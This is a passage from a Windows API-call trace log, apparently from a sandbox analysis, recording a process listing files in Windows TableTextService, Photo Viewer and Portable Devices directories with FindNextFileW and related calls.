dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedShuangPin.txt", cAlternateFileName="")) returned 1 [0131.022] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x480459c4, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x480459c4, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x783c05dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1b9fb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedZhengMa.txt", cAlternateFileName="")) returned 1 [0131.022] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482a6fb4, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x482a6fb4, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x783c05dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xafa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceYi.txt", cAlternateFileName="")) returned 1 [0131.022] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482a6fb4, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x482a6fb4, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x783c05dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xafa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceYi.txt", cAlternateFileName="")) returned 0 [0131.022] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.022] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.022] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.023] CoTaskMemFree (pv=0x4e1c10) [0131.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.023] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US", lpFilePart=0x0) returned 0x38 [0131.023] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228e0708, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.024] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2eda9c, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2eda9c, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll.mui", cAlternateFileName="")) returned 1 [0131.024] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.024] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.024] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228e0708, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.025] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2eda9c, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2eda9c, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll.mui", cAlternateFileName="")) returned 1 [0131.025] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2eda9c, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2eda9c, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll.mui", cAlternateFileName="")) returned 0 [0131.025] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.025] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.025] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.025] CoTaskMemFree (pv=0x4e1c10) [0131.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.026] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Photo Viewer", lpFilePart=0x0) returned 0x2b [0131.028] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.029] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0131.029] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7849cb5e, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x7849cb5e, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xdacc7aae, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16b08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe", cAlternateFileName="")) returned 1 [0131.029] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67366c7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb67366c7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb675c828, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1c4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingEngine.dll", cAlternateFileName="")) returned 1 [0131.029] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6710567, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb6710567, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb67366c7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe0000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll", cAlternateFileName="")) returned 1 [0131.029] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b02653, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x78b02653, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xad33fb10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoBase.dll", cAlternateFileName="")) returned 1 [0131.030] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb66ea407, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb66ea407, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb6710567, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x163800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll", cAlternateFileName="")) returned 1 [0131.030] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.030] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.032] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.032] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0131.032] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7849cb5e, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x7849cb5e, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xdacc7aae, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16b08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe", cAlternateFileName="")) returned 1 [0131.033] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67366c7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb67366c7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb675c828, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1c4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingEngine.dll", cAlternateFileName="")) returned 1 [0131.033] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6710567, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb6710567, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb67366c7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe0000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll", cAlternateFileName="")) returned 1 [0131.033] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b02653, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x78b02653, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xad33fb10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoBase.dll", cAlternateFileName="")) returned 1 [0131.033] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb66ea407, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb66ea407, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb6710567, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x163800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll", cAlternateFileName="")) returned 1 [0131.033] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb66ea407, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb66ea407, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb6710567, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x163800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll", cAlternateFileName="")) returned 0 [0131.034] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.034] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.034] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.035] CoTaskMemFree (pv=0x4e1c10) [0131.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.035] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US", lpFilePart=0x0) returned 0x31 [0131.036] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.036] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe.mui", cAlternateFileName="")) returned 1 [0131.036] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll.mui", cAlternateFileName="")) returned 1 [0131.037] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 1 [0131.037] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.037] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.037] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.038] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe.mui", cAlternateFileName="")) returned 1 [0131.038] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll.mui", cAlternateFileName="")) returned 1 [0131.038] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 1 [0131.038] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 0 [0131.039] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.039] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.039] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.039] CoTaskMemFree (pv=0x4e1c10) [0131.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.039] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Portable Devices", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Portable Devices", lpFilePart=0x0) returned 0x2f [0131.040] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9b7348a4, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9b7348a4, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.040] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb42e9705, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb42e9705, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb430f865, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0131.040] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.040] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.041] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9b7348a4, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9b7348a4, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.041] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb42e9705, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb42e9705, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb430f865, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0131.041] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb42e9705, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb42e9705, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb430f865, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0131.041] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.042] CoTaskMemAlloc 